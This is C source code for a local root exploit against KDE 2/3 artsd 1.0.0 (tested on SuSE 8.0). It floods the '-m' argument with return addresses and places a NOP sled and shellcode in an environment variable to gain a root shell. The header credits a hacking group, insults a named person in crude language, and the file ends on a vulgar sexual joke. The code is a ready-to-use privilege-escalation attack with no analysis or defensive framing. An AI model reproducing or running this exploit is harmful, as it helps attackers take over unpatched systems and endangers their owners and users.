/* bp_artsd.c * KDE 2/3 artsd 1.0.0 local root exploit * * credits: dvorak (helped me A LOT!@#), electronicsouls.org * * greets: * bp members, dvorak, null, r00t, obz, rafa, nouse, module, phrack man, * philer, preamble, eth1cal * fucks to: fd0 (du schwule schlumpf) * * -kokane */ #include #include #include #define BSIZE 1033 #define ESIZE 5120 #define RET 0xbffff808 /* tested on suse linux 8.0 */ unsigned char buttcode[] = "\x33\xDB\x33\xC0\xB0\x1B\xCD\x80" // alarm(0); "\x31\xdb\x89\xd8\xb0\x17\xcd\x80" // setuid(0); "\x31\xc0\x50\x50\xb0\xb5\xcd\x80" // setgid(0); "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; void anal(char *rets, char *evil) { char * arg_[] = { "artsd", "-m", rets, 0 }; char * env_[] = { evil, 0 }; execve("/opt/kde3/bin/artsd", arg_, env_); } int main(int argc, char **argv) { char buf[BSIZE], egg[ESIZE]; unsigned long retaddr=RET; int i; fprintf(stdout, "\n+ KDE 2/3 artsd 1.0.0 local root exploit (bp_artsd.c)\n+ by kokane/buttP!RATEZ\n"); if (argc > 1) retaddr = strtoul(argv[1], NULL, 0); fprintf(stdout, "\n+ ret_addr: 0x%x\n\n", retaddr); /* fill our buffer with ret_addr's */ for (i = BSIZE-1 ; i >= 4 ; i = i-4) *(unsigned long *)&buf[i - 4] = retaddr; /* fill our evil environment variable with nops + shellcode */ memset(egg, 0x90, sizeof(egg)); for (i = 0; i <= strlen(buttcode) ;i++) egg[ESIZE - 1 - i] = buttcode[strlen(buttcode) - i]; memcpy(egg,"UNF=",4); buf[BSIZE - 1] = '\0'; egg[ESIZE - 1] = '\0'; anal(buf, egg); return 0; } /* buttP!RATEZ - providing k-rad anal sex since 2001 */